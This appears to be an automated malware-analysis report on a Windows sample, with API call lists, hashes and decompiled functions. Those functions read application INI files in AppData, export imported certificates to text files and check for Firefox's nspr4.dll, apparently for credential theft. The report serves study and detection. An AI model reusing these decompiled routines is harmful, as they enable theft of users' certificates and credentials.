0x004196c8
0x004196d5
0x004196e2
0x00419702
0x00419862
0x00419865
0x0041986d
0x00000000
0x00419886
0x00000000
0x0041987c
0x0041971b
0x0041971e
0x0041972d
0x00419859
0x0041985c
0x00000000
0x00419733
0x00419738
0x00419738
0x0041973b
0x0041974d
0x00419752
0x00419758
0x0041977b
0x00419780
0x00419786
0x00419794
0x004197a6
0x004197ab
0x004197b1
0x004197b7
0x004197c0
0x004197d5
0x004197da
0x004197e6
0x004197e6
0x004197e9
0x004197ec
0x004197ed
0x004197f2
0x004197f5
0x004197f8
0x004197f9
0x004197fa
0x00419800
0x00419809
0x0041980f
0x00419814
0x00419819
0x0041981c
0x00419826
0x00419828
0x00419828
0x00419826
0x00419819
0x004197c0
0x004197b1
0x00419786
0x0041983f
0x0041984f
0x00419857
0x00000000
0x00419857

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008,?,00000000,00000001), ref: 004196FA
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000001), ref: 00419725
RegCloseKey.ADVAPI32(?,?,00000000,00000001), ref: 0041985C

Part of subcall function 0040AFA9: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00413CB1,?,?,00000104,.exe,00000000), ref: 0040AFBE

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000,00000001), ref: 00419849

Part of subcall function 0040AFA9: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00413CB1,?,?,00000104), ref: 0040B03F

Part of subcall function 0040B05F: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0041C096,?,?), ref: 0040B077

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: b8c4b6bb3c83c92fa85b426b6aa8d77cc17e8a23a626f4f138eaca3b05bfa07e
Instruction ID: 76db51410cfb4ee43092d43bf76b0bc49cfbdc2ecb2797407afaa6d1cfee8bde
Opcode Fuzzy Hash: b8c4b6bb3c83c92fa85b426b6aa8d77cc17e8a23a626f4f138eaca3b05bfa07e
Instruction Fuzzy Hash: F5513BB2910109AADB10EBA5CD45AEFB7BCEF45304F100176F915F3291DB38AE85CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004144F1, Relevance: 6.1, APIs: 4, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004144F1(void* __eflags, intOrPtr _a4) {
				signed int _v5;
				short _v20;
				char _v40;
				char _v60;
				short _v84;
				char _v112;
				char _v144;
				short _v664;
				char _v1184;
				short _v1704;
				char _v2224;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t31;
				long _t33;
				void* _t36;
				void* _t42;
				void* _t44;
				void* _t46;
				long _t50;
				short* _t58;
				char* _t65;
				short _t66;
				void* _t67;
				WCHAR* _t70;
				long _t77;

				_t31 = 0x2a;
				E00405B00(_t31,  &_v144);
				_t33 =  &_v1184;
				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t33);
				if(_t33 == 0) {
					_t33 = E0040C70A( &_v144,  &_v1184,  &_v1184);
					if(_t33 != 0) {
						_t36 = 0x2c;
						E00405B00(_t36,  &_v112);
						_t33 = E0040C70A( &_v112,  &_v1704,  &_v1184);
						if(_t33 != 0) {
							_t33 = GetFileAttributesW( &_v1704);
							if(_t33 != 0xffffffff) {
								_t42 = 0x2d;
								E00405B00(_t42,  &_v60);
								_t44 = 0x2e;
								E00405B00(_t44,  &_v84);
								_t46 = 0x2f;
								E00405B00(_t46,  &_v20);
								_v5 = 0;
								while(1) {
									_push(_v5 & 0x000000ff);
									_push( &_v60);
									_t67 = 0xa;
									_t70 =  &_v40;
									_t50 = E00407B78( &_v60, _t67, _t70);
									if(_t50 < 1) {
										break;
									}
									_t50 = GetPrivateProfileIntW(_t70,  &_v84, 0xffffffff,  &_v1704);
									_t77 = _t50;
									if(_t77 == 0xffffffff) {
										break;
									}
									_t50 = GetPrivateProfileStringW(_t70,  &_v20, 0,  &_v664, 0x104,  &_v1704);
									if(_t50 == 0) {
										L17:
										_v5 = _v5 + 1;
										if(_v5 < 0xfa) {
											continue;
										}
										break;
									}
									_t58 =  &_v664;
									if(_v664 == 0) {
										L12:
										if(_t77 != 1) {
											_t65 =  &_v664;
											L16:
											_t50 = E00414678(0, _t65, _a4, _t90);
											if(_t50 == 0) {
												break;
											}
											goto L17;
										}
										_t50 = E0040C70A( &_v664,  &_v2224,  &_v1184);
										_t90 = _t50;
										if(_t50 == 0) {
											goto L17;
										}
										_t65 =  &_v2224;
										goto L16;
									} else {
										goto L9;
									}
									do {
										L9:
										if( *_t58 == 0x2f) {
											_t66 = 0x5c;
											 *_t58 = _t66;
										}
										_t58 = _t58 + 2;
									} while ( *_t58 != 0);
									goto L12;
								}
								return _t50;
							}
						}
					}
				}
				return _t33;
			}

0x00414504
0x00414505
0x0041450a
0x00414518
0x00414520
0x00414530
0x00414537
0x00414542
0x00414543
0x00414558
0x0041455f
0x0041456c
0x00414575
0x00414580
0x00414581
0x0041458b
0x0041458c
0x00414596
0x00414597
0x0041459c
0x004145a0
0x004145a4
0x004145a8
0x004145ab
0x004145ac
0x004145af
0x004145b9
0x00000000
0x00000000
0x004145cf
0x004145d5
0x004145da
0x00000000
0x00000000
0x004145fb
0x00414603
0x00414664
0x00414664
0x0041466b
0x00000000
0x00000000
0x00000000
0x0041466b
0x00414605
0x00414612
0x00414628
0x0041462b
0x00414652
0x00414658
0x0041465b
0x00414662
0x00000000
0x00000000
0x00000000
0x00414662
0x00414641
0x00414646
0x00414648
0x00000000
0x00000000
0x0041464a
0x00000000
0x00000000
0x00000000
0x00000000
0x00414614
0x00414614
0x00414618
0x0041461c
0x0041461d
0x0041461d
0x00414620
0x00414623
0x00000000
0x00414614
0x00000000
0x00414671
0x00414575
0x0041455f
0x00414537
0x00414675

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 00414518

Part of subcall function 0040C70A: PathCombineW.SHLWAPI(?,)A,?,00412909,?,?), ref: 0040C729

GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0041456C
GetPrivateProfileIntW.KERNEL32 ref: 004145CF
GetPrivateProfileStringW.KERNEL32 ref: 004145FB

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: PathPrivateProfile$AttributesCombineFileFolderString
String ID:
API String ID: 1702184609-0
Opcode ID: e8b8b75637097500d49e9180d47f29306a8da97e8b58f6a238525ee32d0b05b2
Instruction ID: 21005c6c9718e13f74b1c85aa2558ca96333db04c82fa42b0ecafbea02b0b1d3
Opcode Fuzzy Hash: e8b8b75637097500d49e9180d47f29306a8da97e8b58f6a238525ee32d0b05b2
Instruction Fuzzy Hash: 81418E72900218AADF20EBA48C49FDF737DAB46318F5041A7F604F7191D778AE89CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040D318, Relevance: 6.1, APIs: 4, Instructions: 86commemoryCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004015B0,00000000,00004401,004015A0,?), ref: 0040D33E
VariantInit.OLEAUT32(?), ref: 0040D38A
SysAllocString.OLEAUT32(?), ref: 0040D39A
VariantClear.OLEAUT32(?), ref: 0040D3D3

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$AllocClearCreateInitInstanceString
String ID:
API String ID: 3126708813-0
Opcode ID: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
Instruction ID: 1313d04ffc97f138a8e72153f7349ac692d5069025d6b63466d08f6d5b18d84d
Opcode Fuzzy Hash: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
Instruction Fuzzy Hash: 67216D70900224AFCB109BE5CCC8FEF7BB8AF09750F0445B5F906EA2D1D6759904CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0040CE3C, Relevance: 6.1, APIs: 4, Instructions: 84
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CE3C(signed int __edx, void** __esi, void* _a4, signed int _a8) {
				char _v5;
				long _v12;
				void _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t26;
				signed int _t29;
				signed int _t46;
				void** _t48;

				_t48 = __esi;
				_t46 = __edx;
				_v5 = 0;
				if(_a8 <= 0xa00000) {
					_t26 = E0040C189( *__esi);
					_v36 = _t26;
					_v32 = _t46;
					if((_t26 & _t46) != 0xffffffff && E0040C169( *__esi, 0, 0, 2) != 0) {
						_t29 = E0040C189( *__esi);
						_v28 = _t29;
						_v24 = _t46;
						if((_t29 & _t46) != 0xffffffff) {
							E00406F38( &_v20,  &_v20, 0, 5);
							_v20 = __esi[4] ^ _a8;
							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, _a8,  &_v12, 0) == 0 || _v12 != _a8) {
								E0040C169( *_t48, _v28, _v24, 0);
								SetEndOfFile( *_t48);
							} else {
								_v5 = 1;
							}
						}
						FlushFileBuffers( *_t48);
						E0040C169( *_t48, _v36, _v32, 0);
					}
				}
				return _v5;
			}

0x0040ce3c
0x0040ce3c
0x0040ce4d
0x0040ce50
0x0040ce58
0x0040ce5d
0x0040ce62
0x0040ce68
0x0040ce83
0x0040ce88
0x0040ce8d
0x0040ce93
0x0040ce9c
0x0040ceae
0x0040cec1
0x0040cef3
0x0040cefa
0x0040cee4
0x0040cee4
0x0040cee4
0x0040cec1
0x0040cf02
0x0040cf11
0x0040cf11
0x0040ce68
0x0040cf1c

APIs

Part of subcall function 0040C189: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,00000000,00000000), ref: 0040C19E

Part of subcall function 0040C169: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,0040CE15,?,00000000,00000000,00000000,00000000), ref: 0040C17B

WriteFile.KERNEL32(?,?,00000005,00000000,00000000,?,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 0040CEBD
WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 0040CED6
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 0040CEFA
FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 0040CF02

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: File$PointerWrite$BuffersFlush
String ID:
API String ID: 1289656144-0
Opcode ID: c5379564bad4dd386b5a2495c6e3d046866d5d9fe11b22cda77f48e8f82b74bb
Instruction ID: 93010ba2da4dc1e0dfd54e82171d2f394ebba80b71a0dbbe3980b9e71f15489b
Opcode Fuzzy Hash: c5379564bad4dd386b5a2495c6e3d046866d5d9fe11b22cda77f48e8f82b74bb
Instruction Fuzzy Hash: F3314A76800109EFDF119FA5CC81EAEBBB9EF08384F10863AF551B51A1D33A8955DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00405723, Relevance: 6.1, APIs: 4, Instructions: 69
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405723(void* __ebx, void* __ecx) {
				char _v20;
				char* _v84;
				char _v92;
				char _v196;
				char _v716;
				void* __edi;
				void* __esi;
				void* _t15;
				void* _t31;
				void* _t35;
				void* _t36;
				char _t37;
				void** _t43;

				_t36 = __ecx;
				_t35 = __ebx;
				_t15 =  *(__ebx + 0x180);
				if(_t15 == 0 || WaitForSingleObject(_t15, 0) != 0x102) {
					_t43 = _t35 + 0x17c;
					E00408894(_t43);
					E004131E9(_t36,  &_v716, 1);
					E00412E8D(0x2937498d,  &_v196, 0);
					_t37 = 0x44;
					E00406F38( &_v92,  &_v92, 0, _t37);
					_v92 = _t37;
					_v84 =  &_v196;
					ResetEvent( *(_t35 + 0xc));
					if(E0040874C( &_v716, L"-v", 0,  &_v92,  &_v20) != 0) {
						E00406EC1(_t43,  &_v20, 0x10);
						if(WaitForSingleObject( *(_t35 + 0xc), 0x3e8) == 0) {
							goto L6;
						} else {
							TerminateProcess( *_t43, 0);
							E00408894(_t43);
							goto L3;
						}
					} else {
						L3:
						_t31 = 0;
					}
				} else {
					L6:
					_t31 = 1;
				}
				return _t31;
			}

0x00405723
0x00405723
0x00405726
0x00405736
0x0040574c
0x00405752
0x0040575f
0x00405773
0x0040577a
0x00405781
0x0040578f
0x00405792
0x00405795
0x004057b7
0x004057c4
0x004057d9
0x00000000
0x004057db
0x004057de
0x004057e4
0x00000000
0x004057e4
0x004057b9
0x004057b9
0x004057b9
0x004057b9
0x004057eb
0x004057eb
0x004057eb
0x004057eb
0x004057f0

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 0040573B
ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 00405795
WaitForSingleObject.KERNEL32(?,000003E8,?,?,00000010,?,00401638,00000000,?,?), ref: 004057D1
TerminateProcess.KERNEL32(?,00000000), ref: 004057DE

Part of subcall function 00408894: CloseHandle.KERNEL32(?,74B5F560,0040D90F,00000000,004231B8,00000000,0040DA44,00000000,00000000,0000004C,2937498D,?,00000000), ref: 004088A3
Part of subcall function 00408894: CloseHandle.KERNEL32(?,74B5F560,0040D90F,00000000,004231B8,00000000,0040DA44,00000000,00000000,0000004C,2937498D,?,00000000), ref: 004088AC

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandleObjectSingleWait$EventProcessResetTerminate
String ID:
API String ID: 401097067-0
Opcode ID: b612ae6249f92741dd2190aef78ac0784b6fb4947c3c514d602ab6cdc24da0a6
Instruction ID: 5f87e883b2b3177ed601a7f3bf79e4bf6e6d020a5c34226df78a0c494310a20e
Opcode Fuzzy Hash: b612ae6249f92741dd2190aef78ac0784b6fb4947c3c514d602ab6cdc24da0a6
Instruction Fuzzy Hash: 4D119071501208AAEB10ABA5DC49FEF7B7CEB44704F00457AF505F70E5DA389946DA28

Uniqueness

Uniqueness Score: -1.00%

Function 00413ECC, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 61
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00413ECC(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				void* __edi;
				void* _t12;
				intOrPtr _t13;
				void* _t16;
				void* _t17;
				void* _t21;
				void* _t22;
				void* _t23;
				intOrPtr _t24;
				void* _t28;
				intOrPtr* _t29;
				intOrPtr _t31;

				if(E00412FEE() != 0) {
					_t29 = _a16;
					_t24 = _a12;
					_t12 =  *0x42399c(_a4, 0, _t24, _t29, _t23, _t28, _t17);
					_t13 =  *0x423998(_a4, _a8, _t24, _t29);
					_a4 = _t13;
					if(_t12 < 0 && _t13 >= 0 && _t29 != 0 &&  *_t29 != 0 && _t24 != 0) {
						EnterCriticalSection(0x4237dc);
						if(( *0x423774 & 0x00000001) == 0) {
							_t31 =  *_t29;
							if(lstrcmpiW( *(_t24 + 4), L"nspr4.dll") != 0) {
								_t16 = 0;
							} else {
								_t16 = E00404F4F(_t21, _t22, _t31);
							}
							if(_t16 != 0) {
								 *0x423774 =  *0x423774 | 0x00000001;
							}
						}
						LeaveCriticalSection(0x4237dc);
					}
					return _a4;
				}
				goto ( *0x423998);
			}

0x00413ed6
0x00413ee1
0x00413ee5
0x00413eef
0x00413eff
0x00413f05
0x00413f0a
0x00413f23
0x00413f30
0x00413f35
0x00413f45
0x00413f50
0x00413f47
0x00413f49
0x00413f49
0x00413f54
0x00413f56
0x00413f56
0x00413f54
0x00413f5e
0x00413f5e
0x00413f6b
0x00413f6b
0x00413ed9

APIs

Part of subcall function 00412FEE: WaitForSingleObject.KERNEL32(00000000,004141F7,743C152E,00000002), ref: 00412FF6

EnterCriticalSection.KERNEL32(004237DC), ref: 00413F23
lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 00413F3D
LeaveCriticalSection.KERNEL32(004237DC), ref: 00413F5E

Strings

nspr4.dll, xrefs: 00413F37

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeaveObjectSingleWaitlstrcmpi
String ID: nspr4.dll
API String ID: 3081114022-741017701
Opcode ID: f3c2e126582a8555bc95f3e8ed7ae749dfd28fed2c28952debb9dec33471f41a
Instruction ID: 4f1f7c99a1705e70d76c65e7b08eb332ec2c2b6aab07270581c39f9b6d14fb07
Opcode Fuzzy Hash: f3c2e126582a8555bc95f3e8ed7ae749dfd28fed2c28952debb9dec33471f41a
Instruction Fuzzy Hash: 5E11BFB1601315BBCB206F159C48AD77B79EB85756F00406AFC08A7261C778AAC3C69C

Uniqueness

Uniqueness Score: -1.00%

Function 00415670, Relevance: 6.0, APIs: 4, Instructions: 45
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00415670(void* __eflags) {
				void* _t1;
				void* _t2;
				void* _t3;
				long _t6;
				void* _t11;

				_t1 = E00412EC8(_t11, __eflags, 0x19367401, 1);
				_t19 = _t1;
				if(_t1 != 0) {
					_t2 = E00412FEE();
					__eflags = _t2;
					if(_t2 != 0) {
						SetThreadPriority(GetCurrentThread(), 0xfffffff1);
						_t6 = WaitForSingleObject( *0x423e2c, 0x1388);
						while(1) {
							__eflags = _t6 - 0x102;
							if(_t6 != 0x102) {
								goto L6;
							}
							E00405F8D();
							_t6 = WaitForSingleObject( *0x423e2c, 0x1388);
						}
					}
					L6:
					E0040A658(_t19);
					_t3 = 0;
					__eflags = 0;
				} else {
					_t3 = _t1 + 1;
				}
				return _t3;
			}

0x00415681
0x00415686
0x0041568a
0x0041568f
0x00415694
0x00415696
0x004156a1
0x004156b9
0x004156d0
0x004156d0
0x004156d2
0x00000000
0x00000000
0x004156c2
0x004156ce
0x004156ce
0x004156d0
0x004156d4
0x004156d5
0x004156da
0x004156da
0x0041568c
0x0041568c
0x0041568c
0x004156e3

APIs

Part of subcall function 00412EC8: CreateMutexW.KERNEL32(004239A0,00000000,?,?,?,?,?), ref: 00412EE9

GetCurrentThread.KERNEL32 ref: 0041569A
SetThreadPriority.KERNEL32(00000000), ref: 004156A1
WaitForSingleObject.KERNEL32(00001388), ref: 004156B9

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$CreateCurrentMutexObjectPrioritySingleWait
String ID:
API String ID: 3441234504-0
Opcode ID: ebe71c8a04fd62e634b9f8549800036c24110126270438806f8020d8fdf38178
Instruction ID: 8856efe24afbe0ce5ffe0e191701666c9b843376c9924439151da76e30573083
Opcode Fuzzy Hash: ebe71c8a04fd62e634b9f8549800036c24110126270438806f8020d8fdf38178
Instruction Fuzzy Hash: CEF046722047086AC7113BB1AC04CEB762CC745365BA00237FC54F21E1ECAA4C5146ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040A5F2, Relevance: 6.0, APIs: 4, Instructions: 42
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A5F2(HANDLE* _a4) {
				struct tagMSG _v28;
				long _t16;

				while(1) {
					_t16 = MsgWaitForMultipleObjects(1, _a4, 0, 0xffffffff, 0x4ff);
					if(_t16 != 1) {
						break;
					}
					while(PeekMessageW( &_v28, 0, 0, 0, 1) != 0) {
						if(_v28.message != 0x12) {
							TranslateMessage( &_v28);
							DispatchMessageW( &_v28);
							continue;
						}
						goto L5;
					}
				}
				L5:
				return _t16;
			}

0x0040a639
0x0040a645
0x0040a64a
0x00000000
0x00000000
0x0040a625
0x0040a60d
0x0040a614
0x0040a61f
0x00000000
0x0040a61f
0x00000000
0x0040a60d
0x0040a625
0x0040a64d
0x0040a655

APIs

PeekMessageW.USER32 ref: 0040A62F
MsgWaitForMultipleObjects.USER32 ref: 0040A643

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageMultipleObjectsPeekWait
String ID:
API String ID: 3986374578-0
Opcode ID: 1c819ff9606d79a38cd46250d563fd51c893cbd31e328ff33980bb2b3168b344
Instruction ID: 5a9855ad5093bdb2e66b492254d63bb9eaffbf2843b7dd2374db26d7cf6c4ea2
Opcode Fuzzy Hash: 1c819ff9606d79a38cd46250d563fd51c893cbd31e328ff33980bb2b3168b344
Instruction Fuzzy Hash: E4F0FC321043086FD710AAA9DD48D67BBBCEB45354F08093BFA51F21B1D5769814877A

Uniqueness

Uniqueness Score: -1.00%

Function 0041A746, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101
timeCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0041A746(intOrPtr __eax, void* __ecx, intOrPtr* _a4, intOrPtr* _a8, signed int _a12) {
				char _v536;
				char _v600;
				char _v728;
				char _v744;
				struct _SYSTEMTIME _v760;
				intOrPtr _v764;
				intOrPtr _v772;
				intOrPtr _v776;
				char _v784;
				void* __edi;
				void* __esi;
				void* _t47;
				void* _t58;
				intOrPtr* _t59;
				void* _t61;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t71;
				char* _t74;
				signed int _t76;
				void* _t78;
				void* _t79;

				_t61 = __ecx;
				_t78 = (_t76 & 0xfffffff8) - 0x2fc;
				_t59 = _a4;
				__imp__PFXImportCertStore(_t59, _a8, _a12, _t67, _t71, _t58);
				_v776 = __eax;
				if(__eax != 0 && (_a12 & 0x10000000) == 0 && _t59 != 0 &&  *_t59 > 0 &&  *((intOrPtr*)(_t59 + 4)) != 0 && E00412FEE() != 0) {
					GetSystemTime( &_v760);
					E00405B00(0xaa,  &_v600);
					_t74 =  &_v744;
					E00405B00(0xab, _t74);
					E0041A525( &_v536, _t61);
					_push(_v760.wYear & 0x0000ffff);
					_push(_v760.wMonth & 0x0000ffff);
					_push(_v760.wDay & 0x0000ffff);
					_push(_t74);
					_push( &_v536);
					_push( &_v600);
					_t65 = 0x3e;
					_t47 = E00407B78( &_v600, _t65,  &_v728);
					_t79 = _t78 + 0x18;
					if(_t47 > 0 && E0040EB83(_t61, _t65, 2, 0,  &_v728,  *((intOrPtr*)(_t59 + 4)),  *_t59) != 0) {
						_t66 = _a8;
						if(_t66 != 0 &&  *_t66 != 0) {
							 *((short*)(E00406EC1(_t79 + 0x48 + E004079D4( &_v728) * 2, L".txt", 8) + 8)) = 0;
							_t64 = _t66;
							if(E00407CDC(_t52 | 0xffffffff, _t66,  &_v784) != 0) {
								E0040EB83(_t64, _t66, 2, 0,  &_v728, _v772, _v764);
								E00407CCA( &_v784);
							}
						}
					}
				}
				return _v776;
			}

0x0041a746
0x0041a74c
0x0041a753
0x0041a75f
0x0041a765
0x0041a76b
0x0041a7ab
0x0041a7bd
0x0041a7c2
0x0041a7cb
0x0041a7d7
0x0041a7e1
0x0041a7e7
0x0041a7ed
0x0041a7f0
0x0041a7f8
0x0041a800
0x0041a803
0x0041a808
0x0041a80d
0x0041a812
0x0041a82a
0x0041a82f
0x0041a852
0x0041a85d
0x0041a866
0x0041a878
0x0041a87d
0x0041a87d
0x0041a866
0x0041a82f
0x0041a812
0x0041a88c

APIs

PFXImportCertStore.CRYPT32(?,?,?), ref: 0041A75F

Part of subcall function 00412FEE: WaitForSingleObject.KERNEL32(00000000,004141F7,743C152E,00000002), ref: 00412FF6

GetSystemTime.KERNEL32(?), ref: 0041A7AB

Part of subcall function 0041A525: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0041A67C,?,?,00000000), ref: 0041A53A

Strings

.txt, xrefs: 0041A841

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CertImportNameObjectSingleStoreSystemTimeUserWait
String ID: .txt
API String ID: 1412380219-2195685702
Opcode ID: f566a454caf9e8f9e921a29173e374277857e00abc44d241254b0ed5d9a9ba4e
Instruction ID: 503c0de1727f8a5534691f1ebefe36c3478e62f0d344488bed1c0413f2a2ea0d
Opcode Fuzzy Hash: f566a454caf9e8f9e921a29173e374277857e00abc44d241254b0ed5d9a9ba4e
Instruction Fuzzy Hash: D131B231104344AADB20FF55CD05BEBB7A8EF84344F04492AB994A7291EB38DE96C767

Uniqueness

Uniqueness Score: -1.00%

Function 00416F49, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00404B20,00000000,00004401,00404B30,?,?,00000000,00000001), ref: 00416F79
CoCreateInstance.OLE32(00404AF0,00000000,00004401,00404B00,?,?,00000000,00000001), ref: 00416FCC

Strings

D, xrefs: 00416FF7

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInstance
String ID: D
API String ID: 542301482-2746444292
Opcode ID: 970946bdea44795e7aab95972482dbb334eff71c9e399e3fbb1411042e4c7d0b
Instruction ID: ce0df35bbdf105edde795c913fede2154c2d2aec1c1e4c505b309fa7ebfb4f68
Opcode Fuzzy Hash: 970946bdea44795e7aab95972482dbb334eff71c9e399e3fbb1411042e4c7d0b
Instruction Fuzzy Hash: 0E316DB2204305AFD710DF54DC85EABB7ECAF84744F11092EFA5497290E774EC468BAA

Uniqueness

Uniqueness Score: -1.00%

Function 004124FF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004124FF(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char _v368;
				char _v508;
				void* __edi;
				signed int _t17;
				signed int _t18;
				int _t29;
				void* _t35;

				if( *0x423778 == 0) {
					E00413277(0x42375c, __ecx, 2, 0x423778);
				}
				_v8 = _v8 & 0x00000000;
				_t31 =  &_v12;
				_t29 = 0;
				_v12 = 0x80000001;
				_t17 = RegOpenKeyExW(0x80000001, 0x423778, 0, 1,  &_v12);
				if(_t17 != 0) {
					_t18 = _t17 | 0xffffffff;
				} else {
					_t18 = E0040B158( &_v12, 0x42375c,  &_v16,  &_v8);
				}
				_t35 = 0x74;
				if(_t18 == 0xffffffff) {
					L10:
					return E00406F38(_t18, _a4, 0, _t35);
				}
				if(_v16 == 3 && _t18 >= _t35) {
					E00406EC1(_a4, _v8, _t35);
					E00413194(_t31,  &_v508);
					E00408301( &_v368, _t31, _a4, _t35);
					_t29 = 1;
				}
				_t18 = E00406E85(_v8);
				if(_t29 == 0) {
					goto L10;
				}
				return _t18;
			}

0x0041251d
0x00412524
0x00412524
0x00412529
0x0041252d
0x0041253c
0x0041253e
0x00412541
0x00412549
0x0041255e
0x0041254b
0x00412557
0x00412557
0x00412563
0x00412567
0x004125a8
0x00000000
0x004125ae
0x0041256d
0x0041257a
0x00412586
0x00412595
0x0041259a
0x0041259a
0x0041259f
0x004125a6
0x00000000
0x00000000
